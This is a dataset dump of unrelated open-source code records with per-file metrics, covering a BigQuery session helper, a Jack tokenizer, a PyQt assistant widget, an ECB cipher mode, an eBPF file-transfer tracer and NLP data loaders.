'min_samples_leaf': [1, 2],
'criterion': ["mse"],
'n_estimators': [100, 150],
'fit_prior': [False],
'return_result': ["new"],
'use_semantic_types': [False],
'add_index_columns': [False],
'error_on_no_input':[True],
}
},
{"primitive": "d3m.primitives.classification.random_forest.SKlearn"
}
],
"inputs": ["extract_attribute_step2", "extract_target_step"]
},
{
"name": "prediction_step",
"primitives": ["d3m.primitives.data_transformation.construct_predictions.Common"],
"inputs": ["model_step", "to_dataframe_step"]
}
]
}
| 48.157895
| 274
| 0.444653
| 416
| 6,405
| 6.555288
| 0.338942
| 0.061973
| 0.056106
| 0.090942
| 0.387605
| 0.341768
| 0.259259
| 0.239457
| 0.239457
| 0.195086
| 0
| 0.011844
| 0.44637
| 6,405
| 132
| 275
| 48.522727
| 0.757191
| 0.070414
| 0
| 0.198413
| 0
| 0
| 0.353456
| 0.160081
| 0
| 0
| 0
| 0
| 0
| 1
| 0.007937
| false
| 0
| 0.047619
| 0
| 0.063492
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c978cd7b9db932291bd60fddc562ff295cb80fc4
| 192
|
py
|
Python
|
beecrowd exercises/beecrowd-1019.py
|
pachecosamuel/Python-Exercises
|
de542536dd1a2bc0ad27e81824713cda8ad34054
|
[
"MIT"
] | null | null | null |
beecrowd exercises/beecrowd-1019.py
|
pachecosamuel/Python-Exercises
|
de542536dd1a2bc0ad27e81824713cda8ad34054
|
[
"MIT"
] | null | null | null |
beecrowd exercises/beecrowd-1019.py
|
pachecosamuel/Python-Exercises
|
de542536dd1a2bc0ad27e81824713cda8ad34054
|
[
"MIT"
] | null | null | null |
time = eval(input())
qtdtime = [3600, 60, 1]
result = []
for i in qtdtime:
qtd = time // i
result.append(str(qtd))
time -= qtd * i
print(f'{result[0]}:{result[1]}:{result[2]}')
| 16
| 45
| 0.557292
| 30
| 192
| 3.566667
| 0.6
| 0.130841
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.066667
| 0.21875
| 192
| 11
| 46
| 17.454545
| 0.646667
| 0
| 0
| 0
| 0
| 0
| 0.183246
| 0.183246
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.125
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c97a5d77ecd44aba596f1a6d89d78783ed1f6a39
| 5,458
|
py
|
Python
|
bigorm/database.py
|
AnthonyPerez/bigorm
|
67ecdbb1f99cd5c8ec2ca24c7ba5f5dbed7493bb
|
[
"MIT"
] | null | null | null |
bigorm/database.py
|
AnthonyPerez/bigorm
|
67ecdbb1f99cd5c8ec2ca24c7ba5f5dbed7493bb
|
[
"MIT"
] | 3
|
2020-04-06T19:13:58.000Z
|
2020-05-22T22:21:31.000Z
|
bigorm/database.py
|
AnthonyPerez/bigorm
|
67ecdbb1f99cd5c8ec2ca24c7ba5f5dbed7493bb
|
[
"MIT"
] | null | null | null |
import threading
import functools
import sqlalchemy
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
class DatabaseContextError(RuntimeError):
pass
"""
Once an engine is created is is not destroyed until the program itself exits.
Engines are used to produce a new session when a context is entered.
When a context is exited, the session for that context is destroyed.
"""
global_database_context = threading.local()
class DatabaseContext(object):
"""
This is fairly complicated. Follow these rules:
1) Do not create threads in a DatabaseConext. If you
do you will lose the context.
2) With async/await asychronous programming,
enter contexts in atmotic blocks (do not await in a context).
Usage:
with DatabaseContext():
"""
@classmethod
def __get_engines(_):
if not hasattr(global_database_context, 'engines'):
global_database_context.engines = {}
return global_database_context.engines
@classmethod
def __get_sessions(_):
if not hasattr(global_database_context, 'sessions'):
global_database_context.sessions = []
return global_database_context.sessions
@classmethod
def get_session(_):
sessions = DatabaseContext.__get_sessions()
if len(sessions) == 0:
raise DatabaseContextError('Session not established, did you create a DatabaseContext?')
_, session = sessions[-1]
return session
@classmethod
def get_engine(_):
sessions = DatabaseContext.__get_sessions()
if len(sessions) == 0:
raise DatabaseContextError('Session not established, did you create a DatabaseContext?')
engine, _ = sessions[-1]
return engine
@classmethod
def is_in_context(_):
sessions = DatabaseContext.__get_sessions()
return len(sessions) > 0
def __init__(self, *args, **kwargs):
"""
All arguments are forwarded to create_engine
"""
self.args = args
self.kwargs = kwargs
def __enter__(self):
key = (tuple(self.args), tuple(sorted(list(self.kwargs.items()))))
engine, Session = DatabaseContext.__get_engines().get(key, (None, None))
if engine is None:
engine = sqlalchemy.create_engine(
*self.args,
**self.kwargs
)
Session = sqlalchemy.orm.sessionmaker(bind=engine)
DatabaseContext.__get_engines()[key] = (engine, Session)
new_session = Session()
DatabaseContext.__get_sessions().append(
(engine, new_session)
)
def __exit__(self, exception_type, exception_value, traceback):
_, session = DatabaseContext.__get_sessions().pop()
try:
if exception_type is not None:
# There was an exception, roll back.
session.rollback()
finally:
session.close()
class BigQueryDatabaseContext(DatabaseContext):
def __init__(self, project='', default_dataset='', **kwargs):
"""
Args:
project (Optional[str]): The project name, defaults to
your credential's default project.
default_dataset (Optional[str]): The default dataset.
This is used in the case where the table has no
dataset referenced in it's __tablename__
**kwargs (kwargs): Keyword arguments are passed to create_engine.
Example:
'bigquery://some-project/some-dataset' '?'
'credentials_path=/some/path/to.json' '&'
'location=some-location' '&'
'arraysize=1000' '&'
'clustering_fields=a,b,c' '&'
'create_disposition=CREATE_IF_NEEDED' '&'
'destination=different-project.different-dataset.table' '&'
'destination_encryption_configuration=some-configuration' '&'
'dry_run=true' '&'
'labels=a:b,c:d' '&'
'maximum_bytes_billed=1000' '&'
'priority=INTERACTIVE' '&'
'schema_update_options=ALLOW_FIELD_ADDITION,ALLOW_FIELD_RELAXATION' '&'
'use_query_cache=true' '&'
'write_disposition=WRITE_APPEND'
These keyword arguments match those in the job configuration:
https://googleapis.github.io/google-cloud-python/latest/bigquery/generated/google.cloud.bigquery.job.QueryJobConfig.html#google.cloud.bigquery.job.QueryJobConfig
"""
connection_str = 'bigquery://{}/{}'.format(project, default_dataset)
if len(kwargs) > 0:
connection_str += '?'
for k, v in kwargs.items():
connection_str += '{}={}&'.format(k, v)
connection_str = connection_str[:-1]
super(BigQueryDatabaseContext, self).__init__(
connection_str
)
def requires_database_context(f):
"""
Dectorator that causes the function
to throw a DatabaseContextError if the function is called
but a DatabaseContext has not been entered.
"""
@functools.wraps(f)
def wrapper(*args, **kwargs):
if not DatabaseContext.is_in_context():
raise DatabaseContextError('Session not established, did you create a DatabaseContext?')
return f(*args, **kwargs)
return wrapper
| 34.327044
| 177
| 0.622206
| 568
| 5,458
| 5.767606
| 0.357394
| 0.03663
| 0.044872
| 0.025641
| 0.139194
| 0.117216
| 0.09707
| 0.09707
| 0.09707
| 0.09707
| 0
| 0.004344
| 0.283071
| 5,458
| 158
| 178
| 34.544304
| 0.832865
| 0.326676
| 0
| 0.164557
| 0
| 0
| 0.06728
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.139241
| false
| 0.012658
| 0.050633
| 0
| 0.316456
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c97aeafdeaa32ce81d91fe53e55f4082c9dd290e
| 444
|
py
|
Python
|
src/rover/project/code/decision.py
|
juancruzgassoloncan/Udacity-Robo-nanodegree
|
7621360ce05faf90660989e9d28f56da083246c9
|
[
"MIT"
] | 1
|
2020-12-28T13:58:34.000Z
|
2020-12-28T13:58:34.000Z
|
src/rover/project/code/decision.py
|
juancruzgassoloncan/Udacity-Robo-nanodegree
|
7621360ce05faf90660989e9d28f56da083246c9
|
[
"MIT"
] | null | null | null |
src/rover/project/code/decision.py
|
juancruzgassoloncan/Udacity-Robo-nanodegree
|
7621360ce05faf90660989e9d28f56da083246c9
|
[
"MIT"
] | null | null | null |
import numpy as np
from rover_sates import *
from state_machine import *
# This is where you can build a decision tree for determining throttle, brake and steer
# commands based on the output of the perception_step() function
def decision_step(Rover, machine):
if Rover.nav_angles is not None:
machine.run()
else:
Rover.throttle = Rover.throttle_set
Rover.steer = 0
Rover.brake = 0
return Rover
| 23.368421
| 87
| 0.702703
| 65
| 444
| 4.707692
| 0.676923
| 0.084967
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005952
| 0.243243
| 444
| 18
| 88
| 24.666667
| 0.904762
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.272727
| 0
| 0.454545
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9801e27d75fc448c57278f4f2febd70cf000239
| 3,203
|
py
|
Python
|
alfred/views/main_widget.py
|
Sefrwahed/Alfred
|
0b77ec547fb665ef29fe1a3b7e1c4ad30c31170d
|
[
"MIT"
] | 5
|
2016-09-06T10:29:24.000Z
|
2017-02-22T14:07:48.000Z
|
alfred/views/main_widget.py
|
Sefrwahed/Alfred
|
0b77ec547fb665ef29fe1a3b7e1c4ad30c31170d
|
[
"MIT"
] | 66
|
2016-09-06T06:40:24.000Z
|
2022-03-11T23:18:05.000Z
|
alfred/views/main_widget.py
|
Sefrwahed/Alfred
|
0b77ec547fb665ef29fe1a3b7e1c4ad30c31170d
|
[
"MIT"
] | 3
|
2016-10-06T15:17:38.000Z
|
2016-12-04T13:25:53.000Z
|
import json
# PyQt imports
from PyQt5.QtCore import Qt, pyqtSignal, pyqtSlot
from PyQt5.QtWidgets import QDialog
from PyQt5.QtWebChannel import QWebChannel
# Local includes
from .ui.widget_ui import Ui_Dialog
from alfred import data_rc
import alfred.alfred_globals as ag
from alfred.modules.api.view_components import ARow, AColumn, ACard, AHeading
class MainWidget(QDialog, Ui_Dialog):
text_changed = pyqtSignal('QString')
def __init__(self, bridge_obj):
QDialog.__init__(self)
self.setupUi(self)
self.setWindowFlags(Qt.Window | Qt.FramelessWindowHint)
self.setAttribute(Qt.WA_TranslucentBackground, True)
self.lineEdit.returnPressed.connect(self.send_text)
self.channel = QWebChannel(self.webView.page())
self.webView.page().setWebChannel(self.channel)
self.bridge_obj = bridge_obj
self.channel.registerObject("web_bridge", bridge_obj)
def clear_view(self):
self.webView.page().setHtml("")
def set_status_icon_busy(self, busy):
if busy:
self.bot_status_icon.page().runJavaScript("document.getElementById('inner').style.width = '0px';")
else:
self.bot_status_icon.page().runJavaScript("document.getElementById('inner').style.width = '20px';")
def show_busy_state_widget(self):
self.show_special_widget("Please wait...", "Alfred is busy learning at the moment :D")
def show_module_running_widget(self, module_name):
self.show_special_widget("Module is running, Please wait...", "{} module is predicted".format(module_name.capitalize()))
def show_no_modules_view(self):
self.show_special_widget("Please install some modules", "No modules found :(")
def show_special_widget(self, title, content, color=''):
temp = ag.main_components_env.get_template("widgets.html")
components = [ARow(AColumn(12, ACard(title, AHeading(3, content,color=color))))]
html = temp.render(componenets=components)
self.webView.page().setHtml(html)
@pyqtSlot()
def send_text(self):
msg = self.lineEdit.text()
if msg != '':
self.text_changed.emit(msg)
self.last_text = msg
@pyqtSlot(list)
def set_widget_view(self, components):
temp = ag.main_components_env.get_template("widgets.html")
html = temp.render(componenets=components)
# print(html)
self.webView.page().setHtml(html)
@pyqtSlot(list)
def set_view(self, components):
temp = ag.main_components_env.get_template("base.html")
html = temp.render(componenets=components)
# print(html)
self.webView.page().setHtml(html)
@pyqtSlot(str)
def remove_component(self, dom_id):
js = "jQuery('#{}').fadeOut(function(){{ jQuery(this).remove() }});".format(dom_id)
# print(js)
self.webView.page().runJavaScript(js)
@pyqtSlot(str, str)
def append_content(self, parent_dom_id, element_html):
js = "jQuery('{}').prependTo('#{}').hide().fadeIn();".format(("".join(element_html.splitlines())).replace("'", ""), parent_dom_id)
# print(js)
self.webView.page().runJavaScript(js)
| 37.244186
| 138
| 0.67468
| 391
| 3,203
| 5.337596
| 0.352941
| 0.042166
| 0.057499
| 0.042166
| 0.324389
| 0.307619
| 0.26162
| 0.26162
| 0.26162
| 0.196454
| 0
| 0.00348
| 0.192632
| 3,203
| 86
| 139
| 37.244186
| 0.803558
| 0.022167
| 0
| 0.193548
| 0
| 0
| 0.134357
| 0.060461
| 0
| 0
| 0
| 0
| 0
| 1
| 0.193548
| false
| 0
| 0.129032
| 0
| 0.354839
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c98046d6e476b2db7f4e9b5014b73851b0a58d74
| 5,573
|
py
|
Python
|
projects/11/jackTokenizer.py
|
nadavWeisler/Nand2Tetris
|
59c2e616c45044c15b99aeb8459d39b59e5e07ba
|
[
"MIT"
] | null | null | null |
projects/11/jackTokenizer.py
|
nadavWeisler/Nand2Tetris
|
59c2e616c45044c15b99aeb8459d39b59e5e07ba
|
[
"MIT"
] | null | null | null |
projects/11/jackTokenizer.py
|
nadavWeisler/Nand2Tetris
|
59c2e616c45044c15b99aeb8459d39b59e5e07ba
|
[
"MIT"
] | null | null | null |
import re
from utils import *
class JackTokenizer:
def __init__(self, file_name):
self._file = open(file_name, 'r')
self._data = []
self._types = []
self._tokens = []
self._xml = ['<tokens>']
self._tokens_iterator = iter(self._tokens)
self._token_types_iterator = iter(self._types)
self._current_token = ""
self._current_token_type = ""
def got_more_tokens(self):
try:
self._current_token = next(self._tokens_iterator)
self._current_token_type = next(self._token_types_iterator)
return True
except:
return False
def get_token(self):
return self._current_token_type, self._current_token
@staticmethod
def is_keyword(token):
return token in KEYWORDS
@staticmethod
def is_symbol(token):
return token in SYMBOLS
def is_identifier(self, token):
return len(token) >= 1 and not token[0].isdigit() and \
re.match(r'^[A-Za-z0-9_]+', token) is not None and \
not self.is_keyword(token)
@staticmethod
def is_int(token):
return token.isdigit() and 0 <= int(token) <= MAX_INT
@staticmethod
def is_string(token):
return len(token) >= 2 and \
(token[0] == '\"' and
token[-1] == '\"' and
'\"' not in token[1:-1] and
NEW_LINE not in token[1:-1])
def get_token_type(self, token):
if self.is_keyword(token):
return 'keyword'
elif self.is_symbol(token):
return 'symbol'
elif self.is_identifier(token):
return 'identifier'
elif self.is_int(token):
return 'integerConstant'
elif self.is_string(token):
return 'stringConstant'
def filter(self):
start = False
for line in self._file:
segment1 = ""
segment2 = ""
temp = line.strip()
matcher1 = re.match('.*\"[^\"]*//[^\"]*\".*', temp)
matcher2 = re.match('.*\"[^\"]*/\*{1,2}[^\"]*\".*', temp)
matcher3 = re.match('.*\"[^\"]*\*/[^\"]*\".*', temp)
if matcher1 is not None or matcher2 is not None or matcher3 is not None:
self._data.append(temp[:])
continue
arr = temp.split('/*')
if len(arr) > 1:
start = True
segment1 = arr[0]
if start:
arr = temp.split('*/')
if len(arr) > 1:
segment2 = arr[1]
start = False
result = segment1[:] + segment2[:]
if len(result):
self._data.append(segment1[:] + segment2[:])
else:
temp = ' '.join(temp.split('//')[0].split())
if len(temp):
self._data.append(temp[:])
@staticmethod
def convert_lt_gt_quot_amp(char):
if char == '<':
return '<'
elif char == '>':
return '>'
elif char == '\"':
return '"'
elif char == '&':
return '&'
@staticmethod
def split_line_by_symbols(line):
result = list()
idx = 0
temp = ""
while idx < len(line):
if line[idx] == ' ':
result.append(temp)
temp = ""
elif line[idx] in SYMBOLS and line[idx] != '\"':
if len(temp):
result.append(temp)
result.append(line[idx])
temp = ""
else:
result.append(line[idx])
elif line[idx] == '\"':
next_idx = line.find('\"', idx + 1)
while line[next_idx - 1] == '\\':
next_idx = line.find('\"', next_idx)
segment = line[idx:next_idx + 1]
result.append(segment)
temp = ""
idx = next_idx + 1
continue
else:
temp += line[idx]
idx += 1
return result
def tokenize(self):
self.filter()
for line in self._data:
segments = self.split_line_by_symbols(line)
for segment in segments:
current_type = self.get_token_type(segment)
if current_type is not None:
self._types.append(current_type)
self._tokens.append(segment)
if current_type not in {'stringConstant', 'integerConstant'}:
current_type = current_type.lower()
else:
if current_type == 'stringConstant':
current_type = 'stringConstant'
self._tokens[-1] = self._tokens[-1].strip('\"')
segment = segment.strip('\"')
else:
current_type = 'integerConstant'
if segment in {'<', '>', '\"', '&'}:
self._tokens[-1] = self.convert_lt_gt_quot_amp(segment)
segment = self.convert_lt_gt_quot_amp(segment)
self._xml.append('<' + current_type + '> ' + segment + ' </' + current_type + '>')
elif len(segment.strip()):
print(segment)
raise Exception("Invalid Token")
self._xml.append('</tokens>')
| 33.981707
| 102
| 0.466535
| 554
| 5,573
| 4.501805
| 0.176895
| 0.048516
| 0.038492
| 0.024058
| 0.074579
| 0.040096
| 0.040096
| 0
| 0
| 0
| 0
| 0.012689
| 0.406065
| 5,573
| 163
| 103
| 34.190184
| 0.740786
| 0
| 0
| 0.19863
| 0
| 0
| 0.054908
| 0.013099
| 0
| 0
| 0
| 0
| 0
| 1
| 0.089041
| false
| 0
| 0.013699
| 0.041096
| 0.232877
| 0.006849
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c98092ff02eaf3078402f8fe2053638da3880d53
| 1,115
|
py
|
Python
|
main.py
|
TimKozak/NearestFilms
|
991f8b7b1cb9f7f47c6bff818aaae3b91eb80375
|
[
"MIT"
] | 2
|
2021-02-15T20:38:03.000Z
|
2021-12-15T12:42:54.000Z
|
main.py
|
TimKozak/NearestFilms
|
991f8b7b1cb9f7f47c6bff818aaae3b91eb80375
|
[
"MIT"
] | null | null | null |
main.py
|
TimKozak/NearestFilms
|
991f8b7b1cb9f7f47c6bff818aaae3b91eb80375
|
[
"MIT"
] | null | null | null |
"""
Main module of a program.
"""
import folium
from tools import find_coords, user_input
def creating_map():
"""
Creates HTML page for a given data.
"""
year, coords = user_input()
locations = find_coords(year, coords)
mp = folium.Map(location=coords, zoom_start=10)
mp.add_child(folium.Marker(
location=coords,
popup="You are here",
icon=folium.Icon(color='red',
icon_color='lightgray',
icon='home')))
for location in locations:
mp.add_child(folium.Marker(
location=[location[1][0], location[1][1]],
popup=location[0],
icon=folium.Icon(color='green',
icon_color='white',
icon='cloud')))
folium.PolyLine(locations=[(coords[0], coords[1]),
location[1]], color='orange').add_to(mp)
mp.save('nearest_films.html')
print("Map succesfully generated")
if __name__ == "__main__":
creating_map()
# print(find_coords(2017, (52.4081812, -1.510477)))
| 27.195122
| 75
| 0.552466
| 127
| 1,115
| 4.677165
| 0.488189
| 0.060606
| 0.050505
| 0.053872
| 0.10101
| 0.10101
| 0
| 0
| 0
| 0
| 0
| 0.039113
| 0.312108
| 1,115
| 40
| 76
| 27.875
| 0.735332
| 0.100448
| 0
| 0.08
| 0
| 0
| 0.102041
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04
| false
| 0
| 0.08
| 0
| 0.12
| 0.04
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c98373f93bfe070f74725f6b7462934da5ef570c
| 1,366
|
py
|
Python
|
ptCrypt/Symmetric/Modes/ECB.py
|
0awawa0/aCrypt
|
7c5d07271d524b9e5b03035d63587b69bff5abc7
|
[
"MIT"
] | null | null | null |
ptCrypt/Symmetric/Modes/ECB.py
|
0awawa0/aCrypt
|
7c5d07271d524b9e5b03035d63587b69bff5abc7
|
[
"MIT"
] | 25
|
2021-12-08T07:20:11.000Z
|
2021-12-10T12:07:05.000Z
|
ptCrypt/Symmetric/Modes/ECB.py
|
0awawa0/aCrypt
|
7c5d07271d524b9e5b03035d63587b69bff5abc7
|
[
"MIT"
] | null | null | null |
from ptCrypt.Symmetric.Modes.Mode import Mode
from ptCrypt.Symmetric.BlockCipher import BlockCipher
from ptCrypt.Symmetric.Paddings.Padding import Padding
class ECB(Mode):
"""Electronic codebook mode of encryption. The simplest encryption mode.
Encrypts every block independently from other blocks.
More: https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Electronic_codebook_(ECB)
"""
def __init__(self, cipher: BlockCipher, padding: Padding = None):
super().__init__(cipher, padding)
def encrypt(self, data: bytes):
if self.padding:
data = self.padding.pad(data)
blocks = self.splitBlocks(data)
for i in range(len(blocks)):
blocks[i] = self.cipher.encrypt(blocks[i])
return self.joinBlocks(blocks)
def decrypt(self, data: bytes):
if len(data) % self.cipher.blockSize:
raise BlockCipher.WrongBlockSizeException(f"Cannot process data. Data size ({len(data)}) is not multiple of the cipher block size ({self.cipher.blockSize}).")
blocks = self.splitBlocks(data)
for i in range(len(blocks)):
blocks[i] = self.cipher.decrypt(blocks[i])
decrypted = self.joinBlocks(blocks)
if self.padding:
decrypted = self.padding.unpad(decrypted)
return decrypted
| 35.947368
| 170
| 0.666179
| 163
| 1,366
| 5.496933
| 0.380368
| 0.055804
| 0.066964
| 0.033482
| 0.138393
| 0.138393
| 0.138393
| 0.138393
| 0.138393
| 0.138393
| 0
| 0
| 0.233529
| 1,366
| 37
| 171
| 36.918919
| 0.855778
| 0.15959
| 0
| 0.26087
| 0
| 0.043478
| 0.099203
| 0.023029
| 0
| 0
| 0
| 0
| 0
| 1
| 0.130435
| false
| 0
| 0.130435
| 0
| 0.391304
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c983d81c361719032d41d5bf9ca26fcce754a0f2
| 1,335
|
py
|
Python
|
src/static-vxlan-agent/test/arp_tracer.py
|
jbemmel/srl-evpn-proxy
|
240b8180ab03ee06a5043e646781860ba32a3530
|
[
"Apache-2.0"
] | 8
|
2021-08-25T01:08:09.000Z
|
2022-01-18T12:44:41.000Z
|
src/static-vxlan-agent/test/arp_tracer.py
|
jbemmel/srl-evpn-proxy
|
240b8180ab03ee06a5043e646781860ba32a3530
|
[
"Apache-2.0"
] | null | null | null |
src/static-vxlan-agent/test/arp_tracer.py
|
jbemmel/srl-evpn-proxy
|
240b8180ab03ee06a5043e646781860ba32a3530
|
[
"Apache-2.0"
] | 1
|
2022-03-13T22:36:18.000Z
|
2022-03-13T22:36:18.000Z
|
#!/usr/bin/env python3 # Originally python2
# Sample from https://www.collabora.com/news-and-blog/blog/2019/05/14/an-ebpf-overview-part-5-tracing-user-processes/
# Python program with embedded C eBPF program
from bcc import BPF, USDT
import sys
bpf = """
#include <uapi/linux/ptrace.h>
BPF_PERF_OUTPUT(events);
struct file_transf {
char client_ip_str[20];
char file_path[300];
u32 file_size;
u64 timestamp;
};
int trace_file_transfers(struct pt_regs *ctx, char *ipstrptr, char *pathptr, u32 file_size) {
struct file_transf ft = {0};
ft.file_size = file_size;
ft.timestamp = bpf_ktime_get_ns();
bpf_probe_read(&ft.client_ip_str, sizeof(ft.client_ip_str), (void *)ipstrptr);
bpf_probe_read(&ft.file_path, sizeof(ft.file_path), (void *)pathptr);
events.perf_submit(ctx, &ft, sizeof(ft));
return 0;
};
"""
def print_event(cpu, data, size):
event = b["events"].event(data)
print("{0}: {1} is downloding file {2} ({3} bytes)".format(
event.timestamp, event.client_ip_str, event.file_path, event.file_size))
u = USDT(pid=int(sys.argv[1]))
u.enable_probe(probe="file_transfer", fn_name="trace_file_transfers")
b = BPF(text=bpf, usdt_contexts=[u])
b["events"].open_perf_buffer(print_event)
while 1:
try:
b.perf_buffer_poll()
except KeyboardInterrupt:
exit()
| 31.046512
| 117
| 0.702622
| 209
| 1,335
| 4.277512
| 0.511962
| 0.044743
| 0.049217
| 0.03132
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.026455
| 0.150562
| 1,335
| 42
| 118
| 31.785714
| 0.761905
| 0.151311
| 0
| 0.058824
| 0
| 0
| 0.59876
| 0.179805
| 0
| 0
| 0
| 0
| 0
| 1
| 0.029412
| false
| 0
| 0.058824
| 0
| 0.117647
| 0.088235
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c98644a1740c0b9a2213d68e9dafb7bed9e7032f
| 3,500
|
py
|
Python
|
src/utils/loaders.py
|
OE-Heart/span-based-srl
|
a03b46a5ea4c59e14bea80ea724b0de276df4bc1
|
[
"MIT"
] | 41
|
2018-10-05T21:48:33.000Z
|
2022-02-16T10:24:39.000Z
|
src/utils/loaders.py
|
OE-Heart/span-based-srl
|
a03b46a5ea4c59e14bea80ea724b0de276df4bc1
|
[
"MIT"
] | 9
|
2018-10-21T14:45:01.000Z
|
2022-02-25T14:25:29.000Z
|
src/utils/loaders.py
|
OE-Heart/span-based-srl
|
a03b46a5ea4c59e14bea80ea724b0de276df4bc1
|
[
"MIT"
] | 9
|
2018-10-16T07:00:51.000Z
|
2022-02-17T13:10:47.000Z
|
import os
import gzip
import pickle
import h5py
import numpy as np
import theano
from utils.misc import get_file_names_in_dir
from utils.vocab import UNK
class Loader(object):
def __init__(self, argv):
self.argv = argv
def load(self, **kwargs):
raise NotImplementedError
@staticmethod
def load_data(fn):
with gzip.open(fn, 'rb') as gf:
return pickle.load(gf)
@staticmethod
def load_key_value_format(fn):
data = []
with open(fn, 'r') as f:
for line in f:
key, value = line.rstrip().split()
data.append((key, int(value)))
return data
@staticmethod
def load_hdf5(path):
return h5py.File(path, 'r')
def load_txt_from_dir(self, dir_path, file_prefix):
file_names = get_file_names_in_dir(dir_path + '/*')
file_names = [fn for fn in file_names
if os.path.basename(fn).startswith(file_prefix)
and fn.endswith('txt')]
return [self.load(path=fn) for fn in file_names]
def load_hdf5_from_dir(self, dir_path, file_prefix):
file_names = get_file_names_in_dir(dir_path + '/*')
file_names = [fn for fn in file_names
if os.path.basename(fn).startswith(file_prefix)
and fn.endswith('hdf5')]
return [self.load_hdf5(fn) for fn in file_names]
class Conll05Loader(Loader):
def load(self, path, data_size=1000000, is_test=False):
if path is None:
return []
corpus = []
sent = []
with open(path) as f:
for line in f:
elem = [l for l in line.rstrip().split()]
if len(elem) > 0:
if is_test:
sent.append(elem[:6])
else:
sent.append(elem)
else:
corpus.append(sent)
sent = []
if len(corpus) >= data_size:
break
return corpus
class Conll12Loader(Loader):
def load(self, path, data_size=1000000, is_test=False):
if path is None:
return []
corpus = []
sent = []
with open(path) as f:
for line in f:
elem = [l for l in line.rstrip().split()]
if len(elem) > 10:
if is_test:
sent.append(elem[:11])
else:
sent.append(elem)
elif len(elem) == 0:
corpus.append(sent)
sent = []
if len(corpus) >= data_size:
break
return corpus
def load_emb(path):
word_list = []
emb = []
with open(path) as f:
for line in f:
line = line.rstrip().split()
word_list.append(line[0])
emb.append(line[1:])
emb = np.asarray(emb, dtype=theano.config.floatX)
if UNK not in word_list:
word_list = [UNK] + word_list
unk_vector = np.mean(emb, axis=0)
emb = np.vstack((unk_vector, emb))
return word_list, emb
def load_pickle(fn):
with gzip.open(fn, 'rb') as gf:
return pickle.load(gf)
def load_key_value_format(fn):
data = []
with open(fn, 'r') as f:
for line in f:
key, value = line.rstrip().split()
data.append((key, int(value)))
return data
| 26.315789
| 69
| 0.513714
| 440
| 3,500
| 3.938636
| 0.206818
| 0.057126
| 0.017311
| 0.028852
| 0.618581
| 0.608771
| 0.562608
| 0.562608
| 0.562608
| 0.548182
| 0
| 0.015741
| 0.382857
| 3,500
| 132
| 70
| 26.515152
| 0.786574
| 0
| 0
| 0.596154
| 0
| 0
| 0.005143
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.115385
| false
| 0
| 0.076923
| 0.009615
| 0.336538
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
